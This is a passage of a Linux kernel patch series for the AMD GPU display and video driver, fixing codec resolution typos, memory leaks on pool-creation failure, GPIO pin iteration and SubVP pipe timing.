+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+@@ -149,7 +149,7 @@ static struct amdgpu_video_codecs sriov_sc_video_codecs_decode =
+ 
+ /* Beige Goby*/
+ static const struct amdgpu_video_codec_info bg_video_codecs_decode_array[] = {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+ };
+@@ -166,7 +166,7 @@ static const struct amdgpu_video_codecs bg_video_codecs_encode = {
+ 
+ /* Yellow Carp*/
+ static const struct amdgpu_video_codec_info yc_video_codecs_decode_array[] = {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index e3b2b6b4f1a66..7cd17dda32ceb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -103,10 +103,10 @@ static const struct amdgpu_video_codecs vega_video_codecs_encode =
+ /* Vega */
+ static const struct amdgpu_video_codec_info vega_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 4096, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ };
+@@ -120,10 +120,10 @@ static const struct amdgpu_video_codecs vega_video_codecs_decode =
+ /* Raven */
+ static const struct amdgpu_video_codec_info rv_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 4096, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 4096, 4096, 0)},
+@@ -138,10 +138,10 @@ static const struct amdgpu_video_codecs rv_video_codecs_decode =
+ /* Renoir, Arcturus */
+ static const struct amdgpu_video_codec_info rn_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index e08044008186e..8b297ade69a24 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -61,7 +61,7 @@ static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode =
+ 
+ static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index f0b01c8dc4a6b..f72c013d3a5b0 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -42,39 +42,6 @@
+ #include "dm_helpers.h"
+ #include "ddc_service_types.h"
+ 
+-struct monitor_patch_info {
+-	unsigned int manufacturer_id;
+-	unsigned int product_id;
+-	void (*patch_func)(struct dc_edid_caps *edid_caps, unsigned int param);
+-	unsigned int patch_param;
+-};
+-static void set_max_dsc_bpp_limit(struct dc_edid_caps *edid_caps, unsigned int param);
+-
+-static const struct monitor_patch_info monitor_patch_table[] = {
+-{0x6D1E, 0x5BBF, set_max_dsc_bpp_limit, 15},
+-{0x6D1E, 0x5B9A, set_max_dsc_bpp_limit, 15},
+-};
+-
+-static void set_max_dsc_bpp_limit(struct dc_edid_caps *edid_caps, unsigned int param)
+-{
+-	if (edid_caps)
+-		edid_caps->panel_patch.max_dsc_target_bpp_limit = param;
+-}
+-
+-static int amdgpu_dm_patch_edid_caps(struct dc_edid_caps *edid_caps)
+-{
+-	int i, ret = 0;
+-
+-	for (i = 0; i < ARRAY_SIZE(monitor_patch_table); i++)
+-		if ((edid_caps->manufacturer_id == monitor_patch_table[i].manufacturer_id)
+-			&&  (edid_caps->product_id == monitor_patch_table[i].product_id)) {
+-			monitor_patch_table[i].patch_func(edid_caps, monitor_patch_table[i].patch_param);
+-			ret++;
+-		}
+-
+-	return ret;
+-}
+-
+ /* dm_helpers_parse_edid_caps
+  *
+  * Parse edid caps
+@@ -149,8 +116,6 @@ enum dc_edid_status dm_helpers_parse_edid_caps(
+ 	kfree(sads);
+ 	kfree(sadb);
+ 
+-	amdgpu_dm_patch_edid_caps(edid_caps);
+-
+ 	return result;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index e0c8d6f09bb4b..074e70a5c458e 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -462,6 +462,7 @@ static enum bp_result get_gpio_i2c_info(
+ 	uint32_t count = 0;
+ 	unsigned int table_index = 0;
+ 	bool find_valid = false;
++	struct atom_gpio_pin_assignment *pin;
+ 
+ 	if (!info)
+ 		return BP_RESULT_BADINPUT;
+@@ -489,20 +490,17 @@ static enum bp_result get_gpio_i2c_info(
+ 			- sizeof(struct atom_common_table_header))
+ 				/ sizeof(struct atom_gpio_pin_assignment);
+ 
++	pin = (struct atom_gpio_pin_assignment *) header->gpio_pin;
++
+ 	for (table_index = 0; table_index < count; table_index++) {
+-		if (((record->i2c_id & I2C_HW_CAP) == (
+-		header->gpio_pin[table_index].gpio_id &
+-						I2C_HW_CAP)) &&
+-		((record->i2c_id & I2C_HW_ENGINE_ID_MASK)  ==
+-		(header->gpio_pin[table_index].gpio_id &
+-					I2C_HW_ENGINE_ID_MASK)) &&
+-		((record->i2c_id & I2C_HW_LANE_MUX) ==
+-		(header->gpio_pin[table_index].gpio_id &
+-						I2C_HW_LANE_MUX))) {
++		if (((record->i2c_id & I2C_HW_CAP) 				== (pin->gpio_id & I2C_HW_CAP)) &&
++		    ((record->i2c_id & I2C_HW_ENGINE_ID_MASK)	== (pin->gpio_id & I2C_HW_ENGINE_ID_MASK)) &&
++		    ((record->i2c_id & I2C_HW_LANE_MUX) 		== (pin->gpio_id & I2C_HW_LANE_MUX))) {
+ 			/* still valid */
+ 			find_valid = true;
+ 			break;
+ 		}
++		pin = (struct atom_gpio_pin_assignment *)((uint8_t *)pin + sizeof(struct atom_gpio_pin_assignment));
+ 	}
+ 
+ 	/* If we don't find the entry that we are looking for then
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+index 6f77d8e538ab1..9eb9fe5b8d2c5 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+@@ -438,7 +438,7 @@ static void dcn32_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	}
+ 
+ 	if (!new_clocks->dtbclk_en) {
+-		new_clocks->ref_dtbclk_khz = 0;
++		new_clocks->ref_dtbclk_khz = clk_mgr_base->bw_params->clk_table.entries[0].dtbclk_mhz * 1000;
+ 	}
+ 
+ 	/* clock limits are received with MHz precision, divide by 1000 to prevent setting clocks at every call */
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 997ab031f816d..5260ad6de8038 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1070,6 +1070,7 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 	int i, j;
+ 	struct dc_state *dangling_context = dc_create_state(dc);
+ 	struct dc_state *current_ctx;
++	struct pipe_ctx *pipe;
+ 
+ 	if (dangling_context == NULL)
+ 		return;
+@@ -1112,6 +1113,16 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 		}
+ 
+ 		if (should_disable && old_stream) {
++			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++			/* When disabling plane for a phantom pipe, we must turn on the
++			 * phantom OTG so the disable programming gets the double buffer
++			 * update. Otherwise the pipe will be left in a partially disabled
++			 * state that can result in underflow or hang when enabling it
++			 * again for different use.
++			 */
++			if (old_stream->mall_stream_config.type == SUBVP_PHANTOM) {
++				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
++			}
+ 			dc_rem_all_planes_for_stream(dc, old_stream, dangling_context);
+ 			disable_all_writeback_pipes_for_stream(dc, old_stream, dangling_context);
+ 
+@@ -1760,6 +1771,12 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		context->stream_count == 0)
+ 		dc->hwss.prepare_bandwidth(dc, context);
+ 
++	/* When SubVP is active, all HW programming must be done while
++	 * SubVP lock is acquired
++	 */
++	if (dc->hwss.subvp_pipe_control_lock)
++		dc->hwss.subvp_pipe_control_lock(dc, context, true, true, NULL, subvp_prev_use);
++
+ 	if (dc->debug.enable_double_buffered_dsc_pg_support)
+ 		dc->hwss.update_dsc_pg(dc, context, false);
+ 
+@@ -1787,9 +1804,6 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		dc->hwss.wait_for_mpcc_disconnect(dc, dc->res_pool, pipe);
+ 	}
+ 
+-	if (dc->hwss.subvp_pipe_control_lock)
+-		dc->hwss.subvp_pipe_control_lock(dc, context, true, true, NULL, subvp_prev_use);
+-
+ 	result = dc->hwss.apply_ctx_to_hw(dc, context);
+ 
+ 	if (result != DC_OK) {
+@@ -3576,7 +3590,6 @@ static bool could_mpcc_tree_change_for_active_pipes(struct dc *dc,
+ 
+ 	struct dc_stream_status *cur_stream_status = stream_get_status(dc->current_state, stream);
+ 	bool force_minimal_pipe_splitting = false;
+-	uint32_t i;
+ 
+ 	*is_plane_addition = false;
+ 
+@@ -3608,27 +3621,11 @@ static bool could_mpcc_tree_change_for_active_pipes(struct dc *dc,
+ 		}
+ 	}
+ 
+-	/* For SubVP pipe split case when adding MPO video
+-	 * we need to add a minimal transition. In this case
+-	 * there will be 2 streams (1 main stream, 1 phantom
+-	 * stream).
++	/* For SubVP when adding MPO video we need to add a minimal transition.
+ 	 */
+-	if (cur_stream_status &&
+-			dc->current_state->stream_count == 2 &&
+-			stream->mall_stream_config.type == SUBVP_MAIN) {
+-		bool is_pipe_split = false;
+-
+-		for (i = 0; i < dc->res_pool->pipe_count; i++) {
+-			if (dc->current_state->res_ctx.pipe_ctx[i].stream == stream &&
+-					(dc->current_state->res_ctx.pipe_ctx[i].bottom_pipe ||
+-					dc->current_state->res_ctx.pipe_ctx[i].next_odm_pipe)) {
+-				is_pipe_split = true;
+-				break;
+-			}
+-		}
+-
++	if (cur_stream_status && stream->mall_stream_config.type == SUBVP_MAIN) {
+ 		/* determine if minimal transition is required due to SubVP*/
+-		if (surface_count > 0 && is_pipe_split) {
++		if (surface_count > 0) {
+ 			if (cur_stream_status->plane_count > surface_count) {
+ 				force_minimal_pipe_splitting = true;
+ 			} else if (cur_stream_status->plane_count < surface_count) {
+@@ -3650,10 +3647,32 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 	bool temp_subvp_policy;
+ 	enum dc_status ret = DC_ERROR_UNEXPECTED;
+ 	unsigned int i, j;
++	unsigned int pipe_in_use = 0;
+ 
+ 	if (!transition_context)
+ 		return false;
+ 
++	/* check current pipes in use*/
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &transition_base_context->res_ctx.pipe_ctx[i];
++
++		if (pipe->plane_state)
++			pipe_in_use++;
++	}
++
++	/* When the OS add a new surface if we have been used all of pipes with odm combine
++	 * and mpc split feature, it need use commit_minimal_transition_state to transition safely.
++	 * After OS exit MPO, it will back to use odm and mpc split with all of pipes, we need
++	 * call it again. Otherwise return true to skip.
++	 *
++	 * Reduce the scenarios to use dc_commit_state_no_check in the stage of flip. Especially
++	 * enter/exit MPO when DCN still have enough resources.
++	 */
++	if (pipe_in_use != dc->res_pool->pipe_count) {
++		dc_release_state(transition_context);
++		return true;
++	}
++
+ 	if (!dc->config.is_vmin_only_asic) {
+ 		tmp_mpc_policy = dc->debug.pipe_split_policy;
+ 		dc->debug.pipe_split_policy = MPC_SPLIT_AVOID;
+diff --git a/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c b/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c
+index fc6aa098bda06..8db9f75144662 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c
+@@ -1128,6 +1128,7 @@ struct resource_pool *dce60_create_resource_pool(
+ 	if (dce60_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+@@ -1325,6 +1326,7 @@ struct resource_pool *dce61_create_resource_pool(
+ 	if (dce61_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+@@ -1518,6 +1520,7 @@ struct resource_pool *dce64_create_resource_pool(
+ 	if (dce64_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c b/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c
+index b28025960050c..5825e6f412bd7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c
+@@ -1137,6 +1137,7 @@ struct resource_pool *dce80_create_resource_pool(
+ 	if (dce80_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+@@ -1336,6 +1337,7 @@ struct resource_pool *dce81_create_resource_pool(
+ 	if (dce81_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 11e4c4e469473..c06538c37a11f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -867,6 +867,32 @@ static void false_optc_underflow_wa(
+ 		tg->funcs->clear_optc_underflow(tg);
+ }
+ 
++static int calculate_vready_offset_for_group(struct pipe_ctx *pipe)
++{
++	struct pipe_ctx *other_pipe;
++	int vready_offset = pipe->pipe_dlg_param.vready_offset;
++
++	/* Always use the largest vready_offset of all connected pipes */
++	for (other_pipe = pipe->bottom_pipe; other_pipe != NULL; other_pipe = other_pipe->bottom_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->top_pipe; other_pipe != NULL; other_pipe = other_pipe->top_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->next_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->next_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->prev_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->prev_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++
++	return vready_offset;
++}
++
+ enum dc_status dcn10_enable_stream_timing(
+ 		struct pipe_ctx *pipe_ctx,
+ 		struct dc_state *context,
+@@ -910,7 +936,7 @@ enum dc_status dcn10_enable_stream_timing(
+ 	pipe_ctx->stream_res.tg->funcs->program_timing(
+ 			pipe_ctx->stream_res.tg,
+ 			&stream->timing,
+-			pipe_ctx->pipe_dlg_param.vready_offset,
++			calculate_vready_offset_for_group(pipe_ctx),
+ 			pipe_ctx->pipe_dlg_param.vstartup_start,
+ 			pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 			pipe_ctx->pipe_dlg_param.vupdate_width,
+@@ -2900,7 +2926,7 @@ void dcn10_program_pipe(
+ 
+ 		pipe_ctx->stream_res.tg->funcs->program_global_sync(
+ 				pipe_ctx->stream_res.tg,
+-				pipe_ctx->pipe_dlg_param.vready_offset,
++				calculate_vready_offset_for_group(pipe_ctx),
+ 				pipe_ctx->pipe_dlg_param.vstartup_start,
+ 				pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 				pipe_ctx->pipe_dlg_param.vupdate_width);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index a7e0001a8f46d..f348bc15a9256 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1616,6 +1616,31 @@ static void dcn20_update_dchubp_dpp(
+ 		hubp->funcs->phantom_hubp_post_enable(hubp);
+ }
+ 
++static int calculate_vready_offset_for_group(struct pipe_ctx *pipe)
++{
++	struct pipe_ctx *other_pipe;
++	int vready_offset = pipe->pipe_dlg_param.vready_offset;
++
++	/* Always use the largest vready_offset of all connected pipes */
++	for (other_pipe = pipe->bottom_pipe; other_pipe != NULL; other_pipe = other_pipe->bottom_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->top_pipe; other_pipe != NULL; other_pipe = other_pipe->top_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->next_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->next_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->prev_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->prev_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++
++	return vready_offset;
++}
+ 
+ static void dcn20_program_pipe(
+ 		struct dc *dc,
+@@ -1634,16 +1659,14 @@ static void dcn20_program_pipe(
+ 			&& !pipe_ctx->prev_odm_pipe) {
+ 		pipe_ctx->stream_res.tg->funcs->program_global_sync(
+ 				pipe_ctx->stream_res.tg,
+-				pipe_ctx->pipe_dlg_param.vready_offset,
++				calculate_vready_offset_for_group(pipe_ctx),
+ 				pipe_ctx->pipe_dlg_param.vstartup_start,
+ 				pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 				pipe_ctx->pipe_dlg_param.vupdate_width);
+ 
+ 		if (pipe_ctx->stream->mall_stream_config.type != SUBVP_PHANTOM) {
+-			pipe_ctx->stream_res.tg->funcs->wait_for_state(
+-				pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
+-			pipe_ctx->stream_res.tg->funcs->wait_for_state(
+-				pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
+ 		}
+ 
+ 		pipe_ctx->stream_res.tg->funcs->set_vtg_params(
+@@ -2037,7 +2060,7 @@ bool dcn20_update_bandwidth(
+ 
+ 			pipe_ctx->stream_res.tg->funcs->program_global_sync(
+ 					pipe_ctx->stream_res.tg,
+-					pipe_ctx->pipe_dlg_param.vready_offset,
++					calculate_vready_offset_for_group(pipe_ctx),
+ 					pipe_ctx->pipe_dlg_param.vstartup_start,
+ 					pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 					pipe_ctx->pipe_dlg_param.vupdate_width);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index df4f251191424..e4472c6be6c32 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -225,11 +225,7 @@ static void dccg32_set_dtbclk_dto(
+ 	} else {
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_CNTL[params->otg_inst],
+ 				DTBCLK_DTO_ENABLE[params->otg_inst], 0,
+-				PIPE_DTO_SRC_SEL[params->otg_inst], 1);
+-		if (params->is_hdmi)
+-			REG_UPDATE(OTG_PIXEL_RATE_CNTL[params->otg_inst],
+-				PIPE_DTO_SRC_SEL[params->otg_inst], 0);
+-
++				PIPE_DTO_SRC_SEL[params->otg_inst], params->is_hdmi ? 0 : 1);
+ 		REG_WRITE(DTBCLK_DTO_MODULO[params->otg_inst], 0);
+ 		REG_WRITE(DTBCLK_DTO_PHASE[params->otg_inst], 0);
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index d1598e3131f66..33ab6fdc36175 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1901,7 +1901,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 
+ 		pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_dal;
+ 		if (context->stream_count == 1 &&
+-				context->stream_status[0].plane_count <= 1 &&
++				context->stream_status[0].plane_count == 1 &&
+ 				!dc_is_hdmi_signal(res_ctx->pipe_ctx[i].stream->signal) &&
+ 				is_h_timing_divisible_by_2(res_ctx->pipe_ctx[i].stream) &&
+ 				pipe->stream->timing.pix_clk_100hz * 100 > DCN3_2_VMIN_DISPCLK_HZ &&
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index 2abe3967f7fbd..d1bf49d207de4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -531,9 +531,11 @@ void dcn32_set_phantom_stream_timing(struct dc *dc,
+ 	unsigned int i, pipe_idx;
+ 	struct pipe_ctx *pipe;
+ 	uint32_t phantom_vactive, phantom_bp, pstate_width_fw_delay_lines;
++	unsigned int num_dpp;
+ 	unsigned int vlevel = context->bw_ctx.dml.vba.VoltageLevel;
